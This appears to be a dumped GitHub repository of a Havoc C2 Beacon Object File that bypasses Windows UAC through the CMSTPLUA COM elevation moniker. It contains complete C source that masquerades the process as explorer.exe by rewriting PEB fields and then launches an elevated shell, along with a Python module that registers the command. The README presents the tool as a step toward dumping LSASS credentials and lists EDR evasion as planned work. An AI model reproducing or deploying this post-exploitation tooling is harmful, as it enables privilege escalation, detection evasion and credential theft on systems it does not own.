├── src ├── MiniStd.c └── ComExploit │ ├── havoc_uac.py │ └── UACBypassCMSTPLUA.c ├── .gitignore ├── dst └── UACBypassCMSTPLUA.x64.o ├── include ├── Win32Helper.h ├── beacon.h ├── Structs.h └── bofdefs.h ├── Makefile ├── CMakeLists.txt └── README.md /src/MiniStd.c: -------------------------------------------------------------------------------- 1 | #include 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mr-r3bot/bof-modules/HEAD/.gitignore -------------------------------------------------------------------------------- /dst/UACBypassCMSTPLUA.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mr-r3bot/bof-modules/HEAD/dst/UACBypassCMSTPLUA.x64.o -------------------------------------------------------------------------------- /include/Win32Helper.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by QUANGVO on 9/16/2024. 
3 | // 4 | 5 | #ifndef WIN32HELPER_H 6 | #define WIN32HELPER_H 7 | 8 | #endif //WIN32HELPER_H 9 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | module_stomping: 2 | x86_64-w64-mingw32-gcc -c src/ModuleStomping/module_stomping.c -o module_stomping.o 3 | 4 | UACBypass: 5 | x86_64-w64-mingw32-gcc -c src/ComExploit/UACBypassCMSTPLUA.c -o ./dst/UACBypassCMSTPLUA.x64.o 6 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.28) 2 | project(bof_havoc_cs C) 3 | 4 | set(CMAKE_C_STANDARD 23) 5 | 6 | add_executable(bof_havoc_cs src/ModuleStomping/module_stomping.c 7 | include/beacon.h 8 | include/Structs.h 9 | src/ComExploit/UACBypassCMSTPLUA.c 10 | include/Win32Helper.h 11 | src/MiniStd.c 12 | include/bofdefs.h 13 | include/bofdefs.h) 14 | -------------------------------------------------------------------------------- /src/ComExploit/havoc_uac.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | from os.path import exists 3 | 4 | 5 | def uac_bypass(demon_id, *args): 6 | task_id: str = None 7 | demon: Demon = None 8 | packer: Packer = Packer() 9 | binary: bytes = None 10 | # Get agent id 11 | demon = Demon(demon_id) 12 | shell_path = args[0] 13 | shell_args = args[1] 14 | 15 | packer.addstr(shell_path) 16 | packer.addstr(shell_args) 17 | task_id = demon.ConsoleWrite(demon.CONSOLE_TASK, 18 | f"Tasked demon to execute \"@program: {shell_path}, @args {shell_args}\" using COM ") 19 | # Task the agent to execute the BoF with the entry point being "go" 20 | # and the arguments being the packed arguments buffer 21 | demon.InlineExecute(task_id, "go", f"UACBypassCMSTPLUA.{demon.ProcessArch}.o", 
packer.getbuffer(), False) 22 | return task_id 23 | 24 | 25 | RegisterModule("uac-lua-bypass", "lateral movement module", "", "[exploit] (args)", "", "") 26 | RegisterCommand(uac_bypass, "uac-lua-bypass", "com_exec", "Bypass UAC using CMSTPLua", 0, "[shell path]", 27 | "cmd.exe whoami /priv") 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | This is a BOF project for the Havoc C2 framework. Its purpose is to port a known technique for UAC bypass, escalating to Local Administrator on Windows using COM. 3 | - Ideas and source code are from: https://github.com/tijme/conferences/tree/master/2024-09%20OrangeCon 4 | 5 | Then place the `.o` file in the same directory as your Havoc script. 6 | 7 | *Note: this project is still under development, so sorry in advance for my crappy code :(. It was created as a POC and does not have off-sec features.* 8 | 9 | ## Usage 10 | 11 | To build: 12 | ``` 13 | make UACBypass 14 | ``` 15 | 16 | To run: 17 | ``` 18 | uac-lua-bypass com_exec "cmd.exe" "" 19 | ``` 20 | 21 | 22 | ## Ideas for future development 23 | - Dump LSASS using Dup Handle and `MiniDumpWriteDump` 24 | - Implement PPL bypass techniques to dump LSASS with `RunAsPPL=1` 25 | - Implement evasive features and test on EDR 26 | 27 | ## Test in Windows VM with Havoc integration 28 | 29 | Before using `com_exec` to escalate privileges, we cannot use the `nanodump` tool to dump LSASS 30 | 31 | ![image](https://github.com/user-attachments/assets/8635669d-b2d3-4535-b5c0-5176af51afa8) 32 | 33 | After self-injecting the beacon again with higher privilege (local admin using com_exec), we are able to dump LSASS 34 | 35 | ![image](https://github.com/user-attachments/assets/da5435b1-db7b-438e-acc6-6156ddac4206) 36 | 37 | -------------------------------------------------------------------------------- /src/ComExploit/UACBypassCMSTPLUA.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include "../../include/beacon.h" 3 | #include "../../include/Structs.h" 4 | #pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen, memset) 5 | 6 | //------------------------------DEFINING STUFFS-------------------------------------------- 7 | typedef NTSTATUS (NTAPI*_RtlEnterCriticalSection)(PRTL_CRITICAL_SECTION CriticalSection); 8 | 9 | typedef NTSTATUS (NTAPI*_RtlLeaveCriticalSection)(PRTL_CRITICAL_SECTION CriticalSection); 10 | 11 | typedef void (WINAPI*_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); 12 | 13 | #define MemCopy __movsb 14 | #define MemSet __stosb 15 | #define PRNT_WN_ERR(szWnApiName) BeaconPrintf(CALLBACK_OUTPUT, "[!] %s Failed With Error: %d \n", szWnApiName, KERNEL32$GetLastError()); 16 | #define PRNT_NT_ERR(szNtApiName, NtErr) BeaconPrintf(CALLBACK_OUTPUT, "[!] %s Failed With Error: 0x%0.8X \n", szNtApiName, NtErr); 17 | 18 | #define DELETE_HANDLE(H) \ 19 | if (H != NULL && H != INVALID_HANDLE_VALUE){ \ 20 | KERNEL32$CloseHandle(H); \ 21 | H = NULL; \ 22 | } 23 | 24 | typedef interface ICMLuaUtil ICMLuaUtil; 25 | 26 | typedef struct ICMLuaUtilVtbl { 27 | BEGIN_INTERFACE 28 | 29 | HRESULT (STDMETHODCALLTYPE*QueryInterface)(__RPC__in ICMLuaUtil *This, __RPC__in REFIID riid, 30 | _COM_Outptr_ void **ppvObject); 31 | 32 | ULONG (STDMETHODCALLTYPE*AddRef)(__RPC__in ICMLuaUtil *This); 33 | 34 | ULONG (STDMETHODCALLTYPE*Release)(__RPC__in ICMLuaUtil *This); 35 | 36 | HRESULT (STDMETHODCALLTYPE*Method1)(__RPC__in ICMLuaUtil *This); 37 | 38 | HRESULT (STDMETHODCALLTYPE*Method2)(__RPC__in ICMLuaUtil *This); 39 | 40 | HRESULT (STDMETHODCALLTYPE*Method3)(__RPC__in ICMLuaUtil *This); 41 | 42 | HRESULT (STDMETHODCALLTYPE*Method4)(__RPC__in ICMLuaUtil *This); 43 | 44 | HRESULT (STDMETHODCALLTYPE*Method5)(__RPC__in ICMLuaUtil *This); 45 | 46 | HRESULT (STDMETHODCALLTYPE*Method6)(__RPC__in ICMLuaUtil *This); 47 | 48 | 
HRESULT (STDMETHODCALLTYPE*ShellExec)(__RPC__in ICMLuaUtil *This, _In_ LPCTSTR lpFile, 49 | _In_opt_ LPCTSTR lpParameters, _In_opt_ LPCTSTR lpDirectory, _In_ ULONG fMask, 50 | _In_ ULONG nShow); 51 | 52 | END_INTERFACE 53 | } *PICMLuaUtilVtbl; 54 | 55 | /** 56 | * Define ICMLuaUtil interface with ICMLuaUtil VTBL 57 | */ 58 | interface ICMLuaUtil { 59 | CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl; 60 | }; 61 | 62 | //-----------------------------------IMPORTS--------------------------------------- 63 | 64 | DECLSPEC_IMPORT NTSTATUS NTDLL$RtlEnterCriticalSection( 65 | PRTL_CRITICAL_SECTION CriticalSection 66 | ); 67 | 68 | DECLSPEC_IMPORT NTSTATUS NTDLL$RtlLeaveCriticalSection( 69 | PRTL_CRITICAL_SECTION CriticalSection 70 | ); 71 | 72 | DECLSPEC_IMPORT VOID NTDLL$RtlInitUnicodeString( 73 | PUNICODE_STRING DestinationString, 74 | PCWSTR SourceString 75 | ); 76 | 77 | // 78 | DECLSPEC_IMPORT UINT KERNEL32$GetWindowsDirectoryW( 79 | LPWSTR lpBuffer, 80 | UINT uSize 81 | ); 82 | 83 | // 84 | DECLSPEC_IMPORT UINT KERNEL32$GetModuleFileNameW( 85 | HMODULE hModule, 86 | LPWSTR lpFilename, 87 | DWORD nSize 88 | ); 89 | 90 | DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCCH lpMultiByteStr, 91 | int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar); 92 | 93 | DECLSPEC_IMPORT LPVOID KERNEL32$VirtualAlloc( 94 | LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect 95 | ); 96 | 97 | DECLSPEC_IMPORT errno_t MSVCRT$wcscat_s( 98 | wchar_t *_Dst, 99 | rsize_t _SizeInWords, 100 | const wchar_t *_Src 101 | ); 102 | 103 | // 104 | DECLSPEC_IMPORT errno_t MSVCRT$wcscpy_s( 105 | wchar_t *_Dst, rsize_t _SizeInWords, const wchar_t *_Src 106 | ); 107 | 108 | DECLSPEC_IMPORT int MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2); 109 | 110 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 111 | 112 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); 113 | 114 | 
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize(void); 115 | 116 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, 117 | SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, 118 | DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, 119 | DWORD dwCapabilities, void *pReserved3); 120 | 121 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, 122 | REFIID riid, LPVOID *ppv); 123 | 124 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid); 125 | 126 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPCOLESTR lpsz, LPIID lpiid); 127 | 128 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoGetObject(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv); 129 | 130 | DECLSPEC_IMPORT int WINAPI OLE32$StringFromGUID2(REFGUID rguid, LPOLESTR lpsz, int cchMax); 131 | 132 | /* 133 | *Use https://github.com/vxunderground/VX-API/blob/main/VX-API/CreateWindowsObjectPath.cpp 134 | *Use VX-API instead of importing from dll for evasive purpose 135 | * 136 | */ 137 | //-------------------------------------------------------------------------- 138 | 139 | 140 | PEB *GetPeb() { 141 | #ifdef _M_X64 142 | return (void *) __readgsqword(0x60); 143 | #elif _M_IX86 144 | return (void*)__readfsdword(0x30); 145 | #endif 146 | } 147 | 148 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed) { 149 | INT Length = MaximumAllowed; 150 | 151 | while (--Length >= 0) { 152 | if (!(*Destination++ = *Source++)) 153 | return MaximumAllowed - Length - 1; 154 | } 155 | 156 | return MaximumAllowed - Length; 157 | } 158 | 159 | // spoof process 160 | BOOL SpoofExplorerProcess() { 161 | BeaconPrintf(CALLBACK_OUTPUT, "\t Getting explorer.exe path \n"); 162 | WCHAR chExplorerPath[MAX_PATH]; 163 | KERNEL32$GetWindowsDirectoryW(chExplorerPath, MAX_PATH); 164 | MSVCRT$wcscat_s(chExplorerPath, 
sizeof(chExplorerPath) / sizeof(wchar_t), L"\\explorer.exe"); 165 | KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 166 | LPWSTR pwExplorerPath = (LPWSTR) KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 167 | MSVCRT$wcscpy_s(pwExplorerPath, MAX_PATH, chExplorerPath); 168 | BeaconPrintf(CALLBACK_OUTPUT, "Explorer.exe path: %S \n", pwExplorerPath); 169 | PEB *pPeb = GetPeb(); 170 | NTSTATUS STATUS = NTDLL$RtlEnterCriticalSection(pPeb->FastPebLock); 171 | if (STATUS != 0x00) { 172 | return FALSE; 173 | } 174 | BeaconPrintf(CALLBACK_OUTPUT, "\t- Masquerading ImagePathName and CommandLine.\n"); 175 | // Change path name to explorer 176 | NTDLL$RtlInitUnicodeString(&pPeb->ProcessParameters->ImagePathName, chExplorerPath); 177 | NTDLL$RtlInitUnicodeString(&pPeb->ProcessParameters->CommandLine, chExplorerPath); 178 | 179 | PLDR_DATA_TABLE_ENTRY pStartModuleInfo = (PLDR_DATA_TABLE_ENTRY) pPeb->LoaderData->InLoadOrderModuleList.Flink; 180 | PLDR_DATA_TABLE_ENTRY pNextModuleInfo = (PLDR_DATA_TABLE_ENTRY) pPeb->LoaderData->InLoadOrderModuleList.Flink; 181 | 182 | WCHAR wExeFileName[MAX_PATH]; 183 | KERNEL32$GetModuleFileNameW(NULL, wExeFileName, MAX_PATH); 184 | 185 | do { 186 | if (MSVCRT$_wcsicmp(wExeFileName, pNextModuleInfo->FullDllName.Buffer) == 0) { 187 | BeaconPrintf(CALLBACK_OUTPUT, "\t- Masquerading FullDllName and BaseDllName.\n"); 188 | NTDLL$RtlInitUnicodeString(&pNextModuleInfo->FullDllName, pwExplorerPath); 189 | NTDLL$RtlInitUnicodeString(&pNextModuleInfo->BaseDllName, pwExplorerPath); 190 | break; 191 | } 192 | 193 | pNextModuleInfo = (PLDR_DATA_TABLE_ENTRY) pNextModuleInfo->InLoadOrderLinks.Flink; 194 | } while (pNextModuleInfo != pStartModuleInfo); 195 | 196 | NTDLL$RtlLeaveCriticalSection(pPeb->FastPebLock); 197 | return TRUE; 198 | } 199 | 200 | HRESULT ComUacBypass(PWCHAR pszProgram, PWCHAR pszArguments) { 201 | HRESULT hResult = 0x00; 202 | ICMLuaUtil *pICMLuaUtil = NULL; 203 | IID 
hIID_ICMLuaUtil; 204 | IBindCtx *iBindContext = NULL; 205 | IMoniker *iMoniker = NULL; 206 | BIND_OPTS3 sBindingOpts; 207 | hResult = OLE32$CoInitialize(NULL); 208 | 209 | if (hResult < 0) { 210 | BeaconPrintf(CALLBACK_ERROR, "[!] CoInitilize failed 0x%X.\n", hResult); 211 | goto CLEANUP_AND_RETURN; 212 | } 213 | 214 | if (OLE32$IIDFromString(L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}", &hIID_ICMLuaUtil) != 0x00) { 215 | BeaconPrintf(CALLBACK_ERROR, "[!] Could not get IID from ICMLuaUtil GUID \n"); 216 | goto CLEANUP_AND_RETURN; 217 | } 218 | MemSet((PVOID) &sBindingOpts, 0, sizeof(sBindingOpts)); 219 | sBindingOpts.cbStruct = sizeof(sBindingOpts); 220 | sBindingOpts.dwClassContext = CLSCTX_LOCAL_SERVER; 221 | hResult = OLE32$CoGetObject(L"Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", 222 | (BIND_OPTS *) &sBindingOpts, &hIID_ICMLuaUtil, (void **) &pICMLuaUtil); 223 | if (hResult < 0x00) { 224 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to run CoGetObject: 0x%X.\n", hResult); 225 | goto CLEANUP_AND_RETURN; 226 | } 227 | 228 | // Copy the actual file 229 | hResult = pICMLuaUtil->lpVtbl->ShellExec(pICMLuaUtil, (LPSTR) pszProgram, (LPSTR) pszArguments, NULL, 230 | SEE_MASK_DEFAULT, SW_SHOW); 231 | if (hResult < 0x00) { 232 | BeaconPrintf(CALLBACK_ERROR, "[!] 
Failed to run ShellExec: 0x%X.\n", hResult); 233 | goto CLEANUP_AND_RETURN; 234 | } 235 | 236 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Succesfully executed shell!"); 237 | CLEANUP_AND_RETURN: 238 | if (pICMLuaUtil != NULL) pICMLuaUtil->lpVtbl->Release(pICMLuaUtil); 239 | if (iMoniker != NULL) iMoniker->lpVtbl->Release(iMoniker); 240 | if (iBindContext != NULL) iBindContext->lpVtbl->Release(iBindContext); 241 | OLE32$CoUninitialize(); 242 | return hResult; 243 | }; 244 | 245 | void go(char *args, int argc) { 246 | datap Parser = {0}; 247 | DWORD Length = {0}; 248 | PSTR executePath = { 0 }; 249 | PSTR shellArgs = {0}; 250 | PWCHAR pszProgram = (PWCHAR) KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 251 | PWCHAR pszArgs= (PWCHAR) KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 252 | 253 | // Parse arguments 254 | BeaconDataParse(&Parser, args, argc); 255 | executePath = BeaconDataExtract(&Parser, &Length); 256 | shellArgs = BeaconDataExtract(&Parser, &Length); 257 | 258 | CharStringToWCharString(pszProgram, executePath, MAX_PATH); 259 | CharStringToWCharString(pszArgs, shellArgs, MAX_PATH); 260 | 261 | if (!SpoofExplorerProcess()) { 262 | BeaconPrintf(CALLBACK_ERROR, "Spoofing process explorere failed \n"); 263 | } 264 | if (ComUacBypass(pszProgram, pszArgs) == 0x00) { 265 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully launched %S %S\n", pszProgram, pszArgs); 266 | } 267 | } 268 | 269 | -------------------------------------------------------------------------------- /include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 
6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | * 7/18/2023: Added BeaconInformation API for 4.9 14 | * 7/31/2023: Added Key/Value store APIs for 4.9 15 | * BeaconAddValue, BeaconGetValue, and BeaconRemoveValue 16 | * 8/31/2023: Added Data store APIs for 4.9 17 | * BeaconDataStoreGetItem, BeaconDataStoreProtectItem, 18 | * BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries 19 | * 9/01/2023: Added BeaconGetCustomUserData API for 4.9 20 | * 3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL 21 | * Updated the BEACON_INFO data structure to add new parameters 22 | * 4/19/2024: Added BeaconGetSyscallInformation API for 4.10 23 | * 4/25/2024: Added APIs to call Beacon's system call implementation 24 | */ 25 | #ifndef _BEACON_H_ 26 | #define _BEACON_H_ 27 | #include 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif // __cplusplus 32 | 33 | /* data API */ 34 | typedef struct { 35 | char * original; /* the original buffer [so we can free it] */ 36 | char * buffer; /* current pointer into our buffer */ 37 | int length; /* remaining length of data */ 38 | int size; /* total size of this buffer */ 39 | } datap; 40 | 41 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 42 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 43 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 44 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 45 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 46 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 47 | 48 | /* format API */ 49 | typedef struct { 50 | char * original; /* the original buffer [so we can free it] */ 51 | char * buffer; /* current pointer into our buffer */ 52 | int length; /* remaining length of data */ 53 | int size; /* total size of this buffer */ 54 | } formatp; 55 
| 56 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 57 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 58 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, const char * text, int len); 59 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, const char * fmt, ...); 60 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 61 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 62 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 63 | 64 | /* Output Functions */ 65 | #define CALLBACK_OUTPUT 0x0 66 | #define CALLBACK_OUTPUT_OEM 0x1e 67 | #define CALLBACK_OUTPUT_UTF8 0x20 68 | #define CALLBACK_ERROR 0x0d 69 | #define CALLBACK_CUSTOM 0x1000 70 | #define CALLBACK_CUSTOM_LAST 0x13ff 71 | 72 | 73 | DECLSPEC_IMPORT void BeaconOutput(int type, const char * data, int len); 74 | DECLSPEC_IMPORT void BeaconPrintf(int type, const char * fmt, ...); 75 | 76 | 77 | /* Token Functions */ 78 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 79 | DECLSPEC_IMPORT void BeaconRevertToken(); 80 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 81 | 82 | /* Spawn+Inject Functions */ 83 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 84 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 85 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 86 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 87 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 88 | 89 | /* Utility Functions */ 90 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 91 | 92 | /* Beacon Information */ 93 | /* 94 | * ptr - pointer to the base address of the allocated memory. 
95 | * size - the number of bytes allocated for the ptr. 96 | */ 97 | typedef struct { 98 | char * ptr; 99 | size_t size; 100 | } HEAP_RECORD; 101 | #define MASK_SIZE 13 102 | 103 | /* Information the user can set in the USER_DATA via a UDRL */ 104 | typedef enum { 105 | PURPOSE_EMPTY, 106 | PURPOSE_GENERIC_BUFFER, 107 | PURPOSE_BEACON_MEMORY, 108 | PURPOSE_SLEEPMASK_MEMORY, 109 | PURPOSE_BOF_MEMORY, 110 | PURPOSE_USER_DEFINED_MEMORY = 1000 111 | } ALLOCATED_MEMORY_PURPOSE; 112 | 113 | typedef enum { 114 | LABEL_EMPTY, 115 | LABEL_BUFFER, 116 | LABEL_PEHEADER, 117 | LABEL_TEXT, 118 | LABEL_RDATA, 119 | LABEL_DATA, 120 | LABEL_PDATA, 121 | LABEL_RELOC, 122 | LABEL_USER_DEFINED = 1000 123 | } ALLOCATED_MEMORY_LABEL; 124 | 125 | typedef enum { 126 | METHOD_UNKNOWN, 127 | METHOD_VIRTUALALLOC, 128 | METHOD_HEAPALLOC, 129 | METHOD_MODULESTOMP, 130 | METHOD_NTMAPVIEW, 131 | METHOD_USER_DEFINED = 1000, 132 | } ALLOCATED_MEMORY_ALLOCATION_METHOD; 133 | 134 | /** 135 | * This structure allows the user to provide additional information 136 | * about the allocated heap for cleanup. It is mandatory to provide 137 | * the HeapHandle but the DestroyHeap Boolean can be used to indicate 138 | * whether the clean up code should destroy the heap or simply free the pages. 139 | * This is useful in situations where a loader allocates memory in the 140 | * processes current heap. 
141 | */ 142 | typedef struct _HEAPALLOC_INFO { 143 | PVOID HeapHandle; 144 | BOOL DestroyHeap; 145 | } HEAPALLOC_INFO, *PHEAPALLOC_INFO; 146 | 147 | typedef struct _MODULESTOMP_INFO { 148 | HMODULE ModuleHandle; 149 | } MODULESTOMP_INFO, *PMODULESTOMP_INFO; 150 | 151 | typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION { 152 | HEAPALLOC_INFO HeapAllocInfo; 153 | MODULESTOMP_INFO ModuleStompInfo; 154 | PVOID Custom; 155 | } ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION; 156 | 157 | typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION { 158 | BOOL Cleanup; 159 | ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod; 160 | ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation; 161 | } ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION; 162 | 163 | typedef struct _ALLOCATED_MEMORY_SECTION { 164 | ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development 165 | PVOID BaseAddress; // Pointer to virtual address of section 166 | SIZE_T VirtualSize; // Virtual size of the section 167 | DWORD CurrentProtect; // Current memory protection of the section 168 | DWORD PreviousProtect; // The previous memory protection of the section (prior to masking/unmasking) 169 | BOOL MaskSection; // A boolean to indicate whether the section should be masked 170 | } ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION; 171 | 172 | typedef struct _ALLOCATED_MEMORY_REGION { 173 | ALLOCATED_MEMORY_PURPOSE Purpose; // A label to indicate the purpose of the allocated memory 174 | PVOID AllocationBase; // The base address of the allocated memory block 175 | SIZE_T RegionSize; // The size of the allocated memory block 176 | DWORD Type; // The type of memory allocated 177 | ALLOCATED_MEMORY_SECTION Sections[8]; // An array of section information structures 178 | ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation 179 | 
} ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION; 180 | 181 | typedef struct { 182 | ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6]; 183 | } ALLOCATED_MEMORY, *PALLOCATED_MEMORY; 184 | 185 | /* 186 | * version - The version of the beacon dll was added for release 4.10 187 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 188 | * e.g. 0x040900 -> CS 4.9 189 | * 0x041000 -> CS 4.10 190 | * 191 | * sleep_mask_ptr - pointer to the sleep mask base address 192 | * sleep_mask_text_size - the sleep mask text section size 193 | * sleep_mask_total_size - the sleep mask total memory size 194 | * 195 | * beacon_ptr - pointer to beacon's base address 196 | * The stage.obfuscate flag affects this value when using CS default loader. 197 | * true: beacon_ptr = allocated_buffer - 0x1000 (Not a valid address) 198 | * false: beacon_ptr = allocated_buffer (A valid address) 199 | * For a UDRL the beacon_ptr will be set to the 1st argument to DllMain 200 | * when the 2nd argument is set to DLL_PROCESS_ATTACH. 201 | * heap_records - list of memory addresses on the heap beacon wants to mask. 202 | * The list is terminated by the HEAP_RECORD.ptr set to NULL. 203 | * mask - the mask that beacon randomly generated to apply 204 | * 205 | * Added in version 4.10 206 | * allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA 207 | * via a UDRL. 208 | */ 209 | typedef struct { 210 | unsigned int version; 211 | char * sleep_mask_ptr; 212 | DWORD sleep_mask_text_size; 213 | DWORD sleep_mask_total_size; 214 | 215 | char * beacon_ptr; 216 | HEAP_RECORD * heap_records; 217 | char mask[MASK_SIZE]; 218 | 219 | ALLOCATED_MEMORY allocatedMemory; 220 | } BEACON_INFO, *PBEACON_INFO; 221 | 222 | DECLSPEC_IMPORT BOOL BeaconInformation(PBEACON_INFO info); 223 | 224 | /* Key/Value store functions 225 | * These functions are used to associate a key to a memory address and save 226 | * that information into beacon. 
These memory addresses can then be 227 | * retrieved in a subsequent execution of a BOF. 228 | * 229 | * key - the key will be converted to a hash which is used to locate the 230 | * memory address. 231 | * 232 | * ptr - a memory address to save. 233 | * 234 | * Considerations: 235 | * - The contents at the memory address is not masked by beacon. 236 | * - The contents at the memory address is not released by beacon. 237 | * 238 | */ 239 | DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr); 240 | DECLSPEC_IMPORT void * BeaconGetValue(const char * key); 241 | DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key); 242 | 243 | /* Beacon Data Store functions 244 | * These functions are used to access items in Beacon's Data Store. 245 | * BeaconDataStoreGetItem returns NULL if the index does not exist. 246 | * 247 | * The contents are masked by default, and BOFs must unprotect the entry 248 | * before accessing the data buffer. BOFs must also protect the entry 249 | * after the data is not used anymore. 
250 | * 251 | */ 252 | 253 | #define DATA_STORE_TYPE_EMPTY 0 254 | #define DATA_STORE_TYPE_GENERAL_FILE 1 255 | 256 | typedef struct { 257 | int type; 258 | DWORD64 hash; 259 | BOOL masked; 260 | char* buffer; 261 | size_t length; 262 | } DATA_STORE_OBJECT, *PDATA_STORE_OBJECT; 263 | 264 | DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index); 265 | DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index); 266 | DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index); 267 | DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries(); 268 | 269 | /* Beacon User Data functions */ 270 | DECLSPEC_IMPORT char * BeaconGetCustomUserData(); 271 | 272 | /* Beacon System call */ 273 | /* Syscalls API */ 274 | typedef struct 275 | { 276 | PVOID fnAddr; 277 | PVOID jmpAddr; 278 | DWORD sysnum; 279 | } SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY; 280 | 281 | typedef struct 282 | { 283 | SYSCALL_API_ENTRY ntAllocateVirtualMemory; 284 | SYSCALL_API_ENTRY ntProtectVirtualMemory; 285 | SYSCALL_API_ENTRY ntFreeVirtualMemory; 286 | SYSCALL_API_ENTRY ntGetContextThread; 287 | 